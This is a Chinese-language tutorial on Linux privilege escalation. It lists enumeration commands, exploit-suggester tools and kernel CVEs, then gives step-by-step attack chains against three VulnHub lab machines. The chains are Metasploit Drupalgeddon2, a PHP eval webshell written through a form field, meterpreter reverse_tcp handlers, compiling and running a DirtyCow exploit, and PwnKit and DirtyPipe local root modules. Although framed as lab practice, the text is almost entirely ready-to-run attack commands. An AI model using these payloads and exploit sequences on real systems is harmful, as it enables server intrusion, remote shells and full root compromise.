Linux提权一 - 技术栈

#信息收集

当前主机的操作系统

hostnamectl

cat /etc/*-release

lsb_release -a

cat /etc/lsb-release # Debain

cat /etc/redhat-release # Redhat

cat /etc/centos-release # Centos

cat /etc/os-release # Ubuntu

cat /etc/issue

当前主机的内核版本

hostnamectl

uname -a

cat /proc/version

dmesg | grep "Linux version"

#内核漏洞筛选：

MSF检测：

run post/multi/recon/local_exploit_suggester

提权脚本:

https://github.com/liamg/traitor

https://github.com/The-Z-Labs/linux-exploit-suggester

https://github.com/jondonas/linux-exploit-suggester-2

https://github.com/belane/linux-soft-exploit-suggester

综合脚本:

https://github.com/carlospolop/PEASS-ng

https://github.com/diego-treitos/linux-smart-enumeration

https://github.com/redcode-labs/Bashark

https://github.com/rebootuser/LinEnum

#应用场景：

获取到Web权限在Linux服务器上时进行的内核漏洞提权

#常见内核漏洞案例：

dirtycow（CVE-2016-5159）

Pwnkit (CVE-2021-4034)

Dirty Pipe（CVE-2022-0847)

SUDO （CVE-2021-3156）

大脏牛 (CVE-2017--1000405)

CVE-2017-16995

CVE-2021-3560

CVE-2023-1829

CVE-2022-2588

CVE-2021-3493

CVE-2022-32250

CVE-2023-3269

CVE-2022-0995

CVE-2022-2639

CVE-2023-0386

...

#Linux系统提权-Web&内核溢出-Dcow

复现环境：https://www.vulnhub.com/entry/lampiao-1,249/

1、信息收集：

nmap -p1-65535 192.168.139.0/24

2、Web漏洞利用：

search drupal

use exploit/unix/webapp/drupal_drupalgeddon2

set rhost 192.168.46.144

set rport 1898

run

3、内核提权：

upload /root/linux-exploit-suggester.sh /tmp/1.sh

shell

cd /tmp

chmod +x 1.sh

./1.sh

https://github.com/gbonacini/CVE-2016-5195

upload /root/dcow.cpp /tmp/dcow.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")'

./dcow

su root

#Linux系统提权-Web&内核溢出-Pwnkit

复现环境：https://www.vulnhub.com/entry/darkhole-1,724/

1、信息收集：

nmap -p1-65535 192.168.139.0/24

2、Web漏洞利用：

重置管理密码-上传1.phtml-反弹MSF

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 6666

run

3、内核提权

upload /root/linux-exploit-suggester.sh /tmp/1.sh

shell

cd /tmp

chmod +x 1.sh

./1.sh

search cve_2021_4034

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

set session x

run

getuid

shell

cd /root

cat root.txt

#Linux系统提权-Web&内核溢出-DirtyPipe

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

1、信息收集：

nmap -p1-65535 192.168.139.0/24

2、Web漏洞利用

扫描发现-抓包分析-文件写入-反弹MSF

gobuster dir -u http://192.168.139.146 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

message=<?php eval($_POST["pass"]);?>&file=xd.php

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 6666

run

3、内核提权

upload /root/linux-exploit-suggester.sh /tmp/1.sh

shell

cd /tmp

chmod +x 1.sh

./1.sh

search cve_2022_0847

use exploit/linux/local/cve_2022_0847_dirtypipe

set session x

set lhost xx.xx.xx.xx

run

#补充

CVE-2023-0386

https://mp.weixin.qq.com/s/Z6sVuMrYMZV8WD6z1-U95Q